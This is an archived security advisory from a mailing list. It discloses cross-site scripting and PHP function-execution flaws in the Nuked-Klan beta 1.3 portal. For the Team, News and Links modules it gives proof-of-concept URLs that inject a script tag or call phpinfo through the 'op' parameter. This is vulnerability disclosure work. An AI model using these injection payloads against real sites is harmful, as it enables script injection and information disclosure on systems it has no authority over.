lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <005b01c2da13$bcc0c920$0300a8c0@goliath>
From: gregory.lebras at security-corp.org (Grégory Le Bras | Security Corporation)
Subject: [SCSA-006] XSS & Function Execution Vulnerabilities in Nuked-Klan

________________________________________________________________________

Security Corporation Security Advisory [SCSA-006]
________________________________________________________________________

PROGRAM: Nuked-Klan
HOMEPAGE: http://www.nuked-klan.org
VULNERABLE VERSIONS: beta 1.3
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

Nuked Klan is a PHP Gateway for "clans".

(direct quote from Nuked Klan website)


DETAILS & EXPLOITS
________________________________________________________________________

Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan
which allow attackers to inject script codes into the page and use them
on clients browser as if they were provided by the site.

These Cross-Site Scripting vulnerabilities are found in the following
modules : Team, News, Links(Liens).

An attacker can input specially crafted links and/or other
malicious scripts.

Moreover this vulnerability allows an attacker to reach certain
functions of php.



Team
________________________________________________________________________

A vulnerability was discovered at this adress :

XSS:
----

http://[target]/index.php?file=Team&op=<script>alert('Test');</script>


Function Execution:
-------------------

http://[target]/index.php?file=Team&op=phpinfo

(display phpinfo(); - Outputs lots of PHP information)


News
________________________________________________________________________


A vulnerability was discovered at this adress :

XSS:
----

http://[target]/index.php?file=News&op=<script>alert('test');</script>


Function Execution:
-------------------

http://[target]/index.php?file=News&op=phpinfo

(display phpinfo(); - Outputs lots of PHP information)


Links
________________________________________________________________________

A vulnerability was discovered at this adress :

XSS:
----

http://[target]/index.php?file=Liens&op=<script>alert('test');</script>


Function Execution:
-------------------

http://[target]/index.php?file=Liens&op=phpinfo

(display phpinfo(); - Outputs lots of PHP information)


SOLUTIONS
________________________________________________________________________

No solutions for the moment.


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified. It currently develops a patch.


LINKS
________________________________________________________________________

http://www.security-corp.org/index.php?ink=4-15-1

Version Fran?aise :

http://www.security-corp.org/advisories/SCSA-006-FR.txt


------------------------------------------------------------
Gr?gory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ